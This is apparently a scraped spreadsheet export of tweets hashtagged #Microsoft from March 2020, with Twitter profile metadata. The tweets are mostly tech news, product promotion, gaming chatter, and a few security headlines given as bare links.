    <t>{'id': 1234545477565272065, 'id_str': '1234545477565272065', 'name': 'Amber Hendricks', 'screen_name': 'redumasre', 'location': 'Charleston, USA', 'description': 'Then I realize what it is. Itâ€™s him. Something about him makes me feel like I am about to fall. Or turn to liquid. Or burst into flames', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 9, 'listed_count': 0, 'created_at': 'Mon Mar 02 18:25:59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'http://pbs.twimg.com/profile_images/1234550430618836993/g-0f9BOO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234550430618836993/g-0f9BOO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234545477565272065/1583174770',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</si>
  <si>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18:55:09 +0000 2020</t>
  </si>
  <si>
    <t>BrandPost: Huawei Releases Cutting-Edge 5G Network https://t.co/frc9n03sw1 via @HYBRID_CIRCLE #Microsoft #Cloud</t>
  </si>
  <si>
    <t>Mon Mar 02 18:46:39 +0000 2020</t>
  </si>
  <si>
    <t>#playing #Halo in chronological order. Finished #HaloReach #HaloCE and now playing #Halo2 #XboxOne #HaloMCC #videogames #Microsoft</t>
  </si>
  <si>
    <t>{'id': 261784191, 'id_str': '261784191', 'name': 'WynArt', 'screen_name': 'Wyn1977', 'location': 'HTX', 'description': 'Currently working on my art, calligraphy, and novel.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 42, 'friends_count': 57, 'listed_count': 0, 'created_at': 'Sun Mar 06 18:05:47 +0000 2011', 'favourites_count': 502, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 252,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'http://pbs.twimg.com/profile_images/511345953689714690/MiOmEI_8_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/511345953689714690/MiOmEI_8_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/261784191/1410749477', 'profile_link_color': '3B94D9', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '0084B4', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 18:45:19 +0000 2020</t>
  </si>
  <si>
    <t>Celebrating a new decade of Windows devices and innovation at CES 2020 https://t.co/kglDPQ3ELx #tech #microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 18:40:58 +0000 2020</t>
  </si>
  <si>
    <t>Media outlets this week are warning about how #Windows10 file manager hides file extension by default! As if this is a brand new security vulnerability, rather than one #Microsoft introduced with #WindowsXP... in 2001. (but ya, turn extensions back on.) https://t.co/DlmTmFImH8</t>
  </si>
  <si>
    <t>Mon Mar 02 18:40:22 +0000 2020</t>
  </si>
  <si>
    <t>Hach...  #microsoft #xbox https://t.co/SR2tOoET9k</t>
  </si>
  <si>
    <t>{'id': 967758487672549377, 'id_str': '967758487672549377', 'name': 'fuenfzigmvier', 'screen_name': 'fuenfzigmvier', 'location': '', 'description': 'This is the place where I store my random thoughts || ingredients: filmphotography, post punk, video games, TV, fashion, Raptors, candy, 80s/90s and edu', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 68, 'listed_count': 1, 'created_at': 'Sun Feb 25 13:49:38 +0000 2018', 'favourites_count': 1004, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1153,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'http://pbs.twimg.com/profile_images/1186494789426012160/FRwts30x_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1186494789426012160/FRwts30x_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/967758487672549377/1519567429',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</si>
  <si>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18:39:23 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Active Scans for Apache Tomcat Ghostcat Vulnerability Detected, Patch Now:" https://t.co/1mV6CspRAD
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Mon Mar 02 18:37:45 +0000 2020</t>
  </si>
  <si>
    <t>SpatialXL, #understand your WORLD!
SpatialXL is a PrimeThought Software Solutions product that gives spatial capability to #Microsoft Excel
Visit: https://t.co/y3zviXdrLF https://t.co/VHUZr7APyl</t>
  </si>
  <si>
    <t>{'id': 235118340, 'id_str': '235118340', 'name': 'Prime Thought Software', 'screen_name': 'PrimeThought', 'location': 'South Africa', 'description': 'PrimeThought Software Solutions is a software development company focussing on spatial products relating to Mining, Engineering and GIS, such as SpatialXL.', 'url': 'https://t.co/juvJrNUKth', 'entities': {'url': {'urls': [{'url': 'https://t.co/juvJrNUKth', 'expanded_url': 'http://www.primethought.biz', 'display_url': 'primethought.biz', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 15, 'friends_count': 21, 'listed_count': 1, 'created_at': 'Fri Jan 07 11:53:08 +0000 2011', 'favourites_count': 42, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 687,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'http://pbs.twimg.com/profile_images/1101833937557643266/_MwRx6tS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1101833937557643266/_MwRx6tS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/235118340/1568314221',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</si>
  <si>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Mon Mar 02 18:35:27 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news https://t.co/ANBfvqwD6R #Microsoft #Azure</t>
  </si>
  <si>
    <t>Mon Mar 02 18:35:22 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news https://t.co/uY0PikVrRa #Azure #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 18:34:04 +0000 2020</t>
  </si>
  <si>
    <t>Funny thought - 
There is an office at Microsoft that uses Microsoft Office to write and send an e-mail to an Office at Microsoft about Microsoft Office.
#Microsoft #MicrosoftOffice #Thoughts</t>
  </si>
  <si>
    <t>{'id': 3249057871, 'id_str': '3249057871', 'name': 'Faraz sayyed', 'screen_name': 'farazsayyed16', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 121, 'listed_count': 0, 'created_at': 'Thu Jun 18 18:51:24 +0000 2015', 'favourites_count': 4481, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 729,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'http://pbs.twimg.com/profile_images/1096512787549949953/teWNBOYi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1096512787549949953/teWNBOYi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3249057871/1517643037',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</si>
  <si>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18:32:33 +0000 2020</t>
  </si>
  <si>
    <t>#0daytoday #Microsoft #Windows #Kernel Privilege Escalation #Exploit #LPE https://t.co/4GFqBK49ne</t>
  </si>
  <si>
    <t>{'id': 56179836, 'id_str': '56179836', 'name': '0day Exploit Database ðŸŒ´', 'screen_name': 'inj3ct0r', 'location': 'fb.com/inj3ct0rs', 'description': '#0day, #Exploit, #Vulnerability, #Exploits, #Vulnerabilities, #zeroday within mirror ðŸ•µï¸\u200dâ™‚ï¸TOR ðŸŒŽ at https://t.co/BQdUHnNXSf', 'url': 'https://t.co/ifDhCPJfYM', 'entities': {'url': {'urls': [{'url': 'https://t.co/ifDhCPJfYM', 'expanded_url': 'https://0day.today', 'display_url': '0day.today', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/BQdUHnNXSf', 'expanded_url': 'http://mvfjfugdwgc5uwho.onion', 'display_url': 'mvfjfugdwgc5uwho.onion', 'indices': [99, 122]}]}}, 'protected': False, 'followers_count': 44125, 'friends_count': 0, 'listed_count': 969, 'created_at': 'Sun Jul 12 20:15:53 +0000 2009', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18247, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '352726', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/938372675646476288/N06qF9Ob_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/938372675646476288/N06qF9Ob_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/56179836/1405802780', 'profile_link_color': '32940C', 'profile_sidebar_border_color': '829D5E', 'profile_sidebar_fill_color': '042404', 'profile_text_color': '34D126', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 18:32:21 +0000 2020</t>
  </si>
  <si>
    <t>Silicon Valley could be Bidens funding lifeline post South Carolina https://t.co/KILEzFkrxb #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 18:32:05 +0000 2020</t>
  </si>
  <si>
    <t>#JOIN a #WINNING team!
For more information on how to view your #Microsoft #Excel data or any other data #spatially on a map, contact our #sales team on sales@primethought.biz  or visit https://t.co/y3zviXdrLF  https://t.co/kuKVooZC6b</t>
  </si>
  <si>
    <t>Mon Mar 02 18:32:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts focus on role-based training and #certifications can help you develop necessary skills and experience to advance in a competitive cloud-based world. #MCSA, #MCSD and #MCSE certifications will retire on June 30, 2020. 
https://t.co/PEZlk6132a
#chiron #chironusa #learn https://t.co/7g914s1UNz</t>
  </si>
  <si>
    <t>Mon Mar 02 18:31:01 +0000 2020</t>
  </si>
  <si>
    <t>Working remotely during challenging times #microsoft #teams #microsoftteams #msftadvocate https://t.co/y10xpMMB7l</t>
  </si>
  <si>
    <t>Mon Mar 02 18:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#DYK @TroyMIWorks offers FREE access to #Microsoft tutorials through LearnKey to improve your employability? Stop by their office today to register for this free online #training! https://t.co/d9Nv8bgIrg https://t.co/sTlNR2h0Eg</t>
  </si>
  <si>
    <t>{'id': 1617961110, 'id_str': '1617961110', 'name': 'Oakland MI Works!', 'screen_name': 'OaklandMIWorks', 'location': 'Oakland County, MI', 'description': 'Oakland County MI Works! provides business workforce solutions &amp; career management for job seekers. Proud partner of the American Job Center Network. #MIWorks', 'url': 'http://t.co/W138FfyBo8', 'entities': {'url': {'urls': [{'url': 'http://t.co/W138FfyBo8', 'expanded_url': 'http://www.oaklandcountymiworks.com', 'display_url': 'oaklandcountymiworks.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2561, 'friends_count': 1054, 'listed_count': 110, 'created_at': 'Wed Jul 24 15:15:38 +0000 2013', 'favourites_count': 3273, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9320,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'http://pbs.twimg.com/profile_images/378800000186571644/bf2a501b78874f88d788791045a5dcac_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000186571644/bf2a501b78874f88d788791045a5dcac_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1617961110/1375373872', 'profile_link_color': 'A30A0A',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</si>
  <si>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18:29:10 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news https://t.co/zF0O3lAQx8 #Microsoft #Azure</t>
  </si>
  <si>
    <t>Mon Mar 02 18:27:39 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news  https://t.co/Mrl76SNmhi  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Mon Mar 02 18:23:14 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news  https://t.co/BJo5QjTCkK  #azure #microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 18:23:00 +0000 2020</t>
  </si>
  <si>
    <t>You haven't checked out #Microsoft #Whiteboard yet?  Why not? Her, let me show you.
https://t.co/ybNbgNCofd
#MIEExpert 
#Office365 
#MicrosoftEDU 
#Microsoft365 
#UDL
#accessibility</t>
  </si>
  <si>
    <t>Mon Mar 02 18:22:18 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Azure HDInsight and Azure Database for PostgreSQL news https://t.co/TnJjJSDw1F #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 18:20:58 +0000 2020</t>
  </si>
  <si>
    <t>Register for our upcoming webinar presented by #Microsoft MVP and CEO of @VisualSP, Asif Rehmani @asifrehmani - Getting the Best Use Out of All #Office365 Applications https://t.co/aRvaaeiCDJ https://t.co/XkPrCxjgeE</t>
  </si>
  <si>
    <t>{'id': 3107946601, 'id_str': '3107946601', 'name': 'ExtranetUserManager', 'screen_name': 'eumgr', 'location': 'Mississauga, Ontario', 'description': 'Allow users inside and outside your corporate network to collaborate securely and share information with streamlined simplicity. Contact us, we do the rest.', 'url': 'http://t.co/fdo4M20Qsa', 'entities': {'url': {'urls': [{'url': 'http://t.co/fdo4M20Qsa', 'expanded_url': 'http://www.extranetusermanager.com', 'display_url': 'extranetusermanager.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 159, 'friends_count': 338, 'listed_count': 48, 'created_at': 'Wed Mar 25 19:12:56 +0000 2015', 'favourites_count': 92, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 958,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'http://pbs.twimg.com/profile_images/930907918282756097/4r79R4oy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/930907918282756097/4r79R4oy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3107946601/1516139855', 'profile_link_color': '80205D',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</si>
  <si>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18:20:57 +0000 2020</t>
  </si>
  <si>
    <t>Behind the scenes on Team Explorers practice run at #Microsoft for the @DARPA SubT Urban Challenge https://t.co/TxSlXlFCsg #robotics</t>
  </si>
  <si>
    <t>Mon Mar 02 18:19:25 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 actually makes things a lot easier, but there are quite a few bugs upgrading Sony Laptops. 
#Microsoft #Windows10 #Vaio
Have to mention, it is one of the best laptop experiences I have ever had. Happy to see the new Vaio Laptop. Unfortunately, its not Sony no more. https://t.co/SxgbpIOSq4</t>
  </si>
  <si>
    <t>{'id': 1198583830317191168, 'id_str': '1198583830317191168', 'name': 'Moses Karthik', 'screen_name': 'MosesKarthik1', 'location': 'Bengaluru, India', 'description': 'Partner at INSIGHT STUDIO #loverofdogs  #pcgamer  #youtuber  #filmeditor', 'url': 'https://t.co/MLTNCA1Mx0', 'entities': {'url': {'urls': [{'url': 'https://t.co/MLTNCA1Mx0', 'expanded_url': 'https://insightstudio053.wixsite.com/website', 'display_url': 'insightstudio053.wixsite.com/website', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 12, 'listed_count': 0, 'created_at': 'Sun Nov 24 12:47:35 +0000 2019', 'favourites_count': 112, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 42, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1204802961471201281/PxS9m44M_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204802961471201281/PxS9m44M_normal.jpg',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</si>
  <si>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18:17:59 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news
- Microsoft supported distribution of Apache Hadoop
https://t.co/oonvBABx91
#Azure #Microsoft #Cloud #HDInsight #PostgreSQL https://t.co/g6jsOgBrLi</t>
  </si>
  <si>
    <t>Mon Mar 02 18:17:16 +0000 2020</t>
  </si>
  <si>
    <t>"But the mega software companies want to get a piece of the RPA opportunity. And the one that is perhaps best positioned is Microsoft." 
#rpa #roboticprocessautomation #microsoft https://t.co/W4ks3VVLry</t>
  </si>
  <si>
    <t>{'id': 14234186, 'id_str': '14234186', 'name': 'Mark Webster', 'screen_name': 'markwebster', 'location': 'Madison, WI', 'description': 'Apple fan. From Cork, Ireland, now living in Madison, Wisconsin. How the hell did that happen!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 378, 'friends_count': 331, 'listed_count': 6, 'created_at': 'Thu Mar 27 10:38:03 +0000 2008', 'favourites_count': 43, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3856,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'http://pbs.twimg.com/profile_images/863815161630556160/TEq8F7Fu_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/863815161630556160/TEq8F7Fu_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14234186/1470443738',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</si>
  <si>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Mon Mar 02 18:16:37 +0000 2020</t>
  </si>
  <si>
    <t>Do you want to improve the way your employees communicate? Then you need to check out this video to see how @CliftonCoffeeRoasters expanded their business with #Teamworksolutions from #Microsoft. https://t.co/RCadZ3oJKa</t>
  </si>
  <si>
    <t>{'id': 96154781, 'id_str': '96154781', 'name': 'Josef Wainz', 'screen_name': 'Joe_TurtleWorks', 'location': '', 'description': '', 'url': 'https://t.co/OJQZc6xr4o', 'entities': {'url': {'urls': [{'url': 'https://t.co/OJQZc6xr4o', 'expanded_url': 'http://turtle.works', 'display_url': 'turtle.works', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 53, 'friends_count': 136, 'listed_count': 0, 'created_at': 'Fri Dec 11 16:11:10 +0000 2009', 'favourites_count': 22, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 481,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'http://pbs.twimg.com/profile_images/1571490970/Approved_Turtle_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1571490970/Approved_Turtle_normal.png', 'profile_link_color': '94D487', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'FFF7CC', 'profile_text_color': '0C3E53', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 18:16:22 +0000 2020</t>
  </si>
  <si>
    <t>Over the last decade, #Microsoft has become one of the largest open source contributors in the world, adding to Hadoop, Linux, Kubernetes, Python, and more. https://t.co/SK9gK7f1mN</t>
  </si>
  <si>
    <t>Mon Mar 02 18:16:16 +0000 2020</t>
  </si>
  <si>
    <t>#Google should have stayed out of the console business. It belongs to #Sony #Nintendo and #Microsoft. #GoogleStadia #Xbox #Playstation #NintendoSwitch</t>
  </si>
  <si>
    <t>{'id': 1142646430726623232, 'id_str': '1142646430726623232', 'name': 'ADaveW ðŸ§¢', 'screen_name': 'AaronDavW1', 'location': 'Culver City, CA', 'description': 'Stewart and Nightwatchmen at Foshay Lodge? Trying to reach 100 followers #HermeticOrderoftheGoldenDawn #TheFirstUnitedChurchofCthulu #Freemason', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 87, 'friends_count': 155, 'listed_count': 0, 'created_at': 'Sun Jun 23 04:11:53 +0000 2019', 'favourites_count': 2934, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3034, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1142647242186117121/haL0lJC3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1142647242186117121/haL0lJC3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1142646430726623232/1561444773',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</si>
  <si>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18:16:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft 365 Business Voice - the phone system designed for @Office365. Learn More&amp;gt;&amp;gt; https://t.co/6GKonuO855
#MsTeams
#communications 
#BusinessVoice https://t.co/ZCwMIe4BeO</t>
  </si>
  <si>
    <t>Mon Mar 02 18:14:33 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news https://t.co/zmP5DPlJi1 #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Mon Mar 02 18:13:25 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news https://t.co/nMcXWO3Rh6 #Azure #Microsoft</t>
  </si>
  <si>
    <t>Mon Mar 02 18:11:07 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news
#Microsoft #Azure
https://t.co/nq2E9iYqPO</t>
  </si>
  <si>
    <t>Mon Mar 02 18:10:12 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news https://t.co/mUkadbwkJg #Microsoft #Azure</t>
  </si>
  <si>
    <t>Mon Mar 02 18:10:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft is expanding its antivirus software to iOS and Android  and it's betting on AI in a bid to dominate the enterprise cybersecurity market https://t.co/2u7deU9teZ #CyberSecurity #microsoft #ai #ArtificialInteligence #MachineLearning https://t.co/4rrDTg7aWr</t>
  </si>
  <si>
    <t>Mon Mar 02 18:09:59 +0000 2020</t>
  </si>
  <si>
    <t>"Research shows that people want consistency in #design and connection to brand, with enough differences to aid in recognition." How has #Microsoft updated their icons while keeping them familiar, beautiful, and inclusive? 
https://t.co/xF1KhDoCgp
#Icons #UserExperience #UX</t>
  </si>
  <si>
    <t>{'id': 18243941, 'id_str': '18243941', 'name': 'Cantina', 'screen_name': 'cantinac', 'location': 'Boston, MA', 'description': 'A strategy design &amp; development agency. We help customer-focused organizations harness the power of design and technology to deliver experiences that matter.', 'url': 'https://t.co/pa7v0qiOmv', 'entities': {'url': {'urls': [{'url': 'https://t.co/pa7v0qiOmv', 'expanded_url': 'http://www.cantina.co', 'display_url': 'cantina.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 916, 'friends_count': 682, 'listed_count': 179, 'created_at': 'Fri Dec 19 15:45:08 +0000 2008', 'favourites_count': 668, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6115, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '2999EB', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1148984892476317697/uIkjrb3u_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148984892476317697/uIkjrb3u_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18243941/1504625091', 'profile_link_color': 'FFA200',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</si>
  <si>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Mon Mar 02 18:07:33 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Announces a Cloud-based Print Solution   #printing #Microsoft 
https://t.co/fwBDs51mNR https://t.co/RUs4Pcd7qP</t>
  </si>
  <si>
    <t>{'id': 224672352, 'id_str': '224672352', 'name': 'CDRInfo.com', 'screen_name': 'CDRInfo_com', 'location': '', 'description': 'Daily technology news and hardware reviews', 'url': 'http://t.co/DS6y7mk1o2', 'entities': {'url': {'urls': [{'url': 'http://t.co/DS6y7mk1o2', 'expanded_url': 'http://www.cdrinfo.com', 'display_url': 'cdrinfo.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 259, 'friends_count': 353, 'listed_count': 11, 'created_at': 'Thu Dec 09 15:44:05 +0000 2010', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 27396, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'BCCDD6', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1066354460086145024/DoVcASJr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1066354460086145024/DoVcASJr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/224672352/1570877650', 'profile_link_color': '276075', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EDEDED', 'profile_text_color': '524752', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Mon Mar 02 18:06:24 +0000 2020</t>
  </si>
  <si>
    <t>#Azure HDInsight and Azure Database for PostgreSQL news https://t.co/UIHFyDH7rD via @hybrid_ts #Microsoft https://t.co/L4On261x2I</t>
  </si>
  <si>
    <t>Mon Mar 02 18:05:19 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Healthcares delicate balance in the digital age: " https://t.co/waDMqfQpKs
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Mon Mar 02 18:05:15 +0000 2020</t>
  </si>
  <si>
    <t>Azure Red Hat OpenShift 4.3 is now in preview https://t.co/8Gnw3njD4a #Microsoft #Azure</t>
  </si>
  <si>
    <t>Mon Mar 02 18:05:14 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN SSTP load balancing with @CitrixADC. #Microsoft #Windows10 #Win10 #mobility #Citrix #CitrixADC #ADC #NetScaler #aovpn |https://t.co/pGufTa0WfS</t>
  </si>
  <si>
    <t>Mon Mar 02 18:04:14 +0000 2020</t>
  </si>
  <si>
    <t>Want to learn more about Microsoft Teams? Join the Chicagoland #Teams User Group on LinkedIn https://t.co/geIjRcYHRy #Chicago #Chicagoland #Microsoft #UserGroup</t>
  </si>
  <si>
    <t>{'id': 2207736170, 'id_str': '2207736170', 'name': 'Jill Neumann', 'screen_name': 'BDO_Jill', 'location': 'Oak Brook, IL', 'description': 'Partner Alliance Manager at BDO Digital, @BDO_USA. Connect with me at https://t.co/yyzGrrrtFfâ€¦. All opinions are my own, as they say.', 'url': 'https://t.co/LkaNwf3jTN', 'entities': {'url': {'urls': [{'url': 'https://t.co/LkaNwf3jTN', 'expanded_url': 'https://www.bdo.com/digital', 'display_url': 'bdo.com/digital', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/yyzGrrrtFf', 'expanded_url': 'http://linkedin.com/in/bdojillneum', 'display_url': 'linkedin.com/in/bdojillneum', 'indices': [70, 93]}]}}, 'protected': False, 'followers_count': 294, 'friends_count': 745, 'listed_count': 116, 'created_at': 'Thu Nov 21 19:54:23 +0000 2013', 'favourites_count': 976, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4290,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'http://pbs.twimg.com/profile_images/1219791587716354048/Iwfhymc6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219791587716354048/Iwfhymc6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2207736170/1579656095',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</si>
  <si>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18:03:43 +0000 2020</t>
  </si>
  <si>
    <t>Azure HDInsight and Azure Database for PostgreSQL news  https://t.co/pu9duggwX6 #Microsoft #Azure #AzureFamily</t>
  </si>
  <si>
    <t>Mon Mar 02 18:03:37 +0000 2020</t>
  </si>
  <si>
    <t>Joining NASA - National Aeronautics and Space Administration and Microsoft in a live chat with the ISS. #miexpert #mie #edtech #microsoft https://t.co/ccjpHapLys</t>
  </si>
  <si>
    <t>{'id': 28547572, 'id_str': '28547572', 'name': 'S.Pleasants', 'screen_name': 'appletwo78', 'location': 'USA and Global', 'description': 'Technology entrepreneur who is passionate about disruptive technology, education, politics and is one outside the box strategic thinker.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 102, 'friends_count': 228, 'listed_count': 14, 'created_at': 'Fri Apr 03 12:00:15 +0000 2009', 'favourites_count': 556, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6644,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'http://pbs.twimg.com/profile_images/1056700912062873601/l7hqBvm3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1056700912062873601/l7hqBvm3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/28547572/1515505559', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Mon Mar 02 18:01:55 +0000 2020</t>
  </si>
  <si>
    <t>How to Use Microsoft Forms to Develop Better Surveys/Questionnaires
https://t.co/BLGIOqStEJ
#SCLawyers #SCLawPractice #SCParalegals #Microsoft #MicrosoftForms #TechTips #MondayMotivation https://t.co/bTxCNYNDnE</t>
  </si>
  <si>
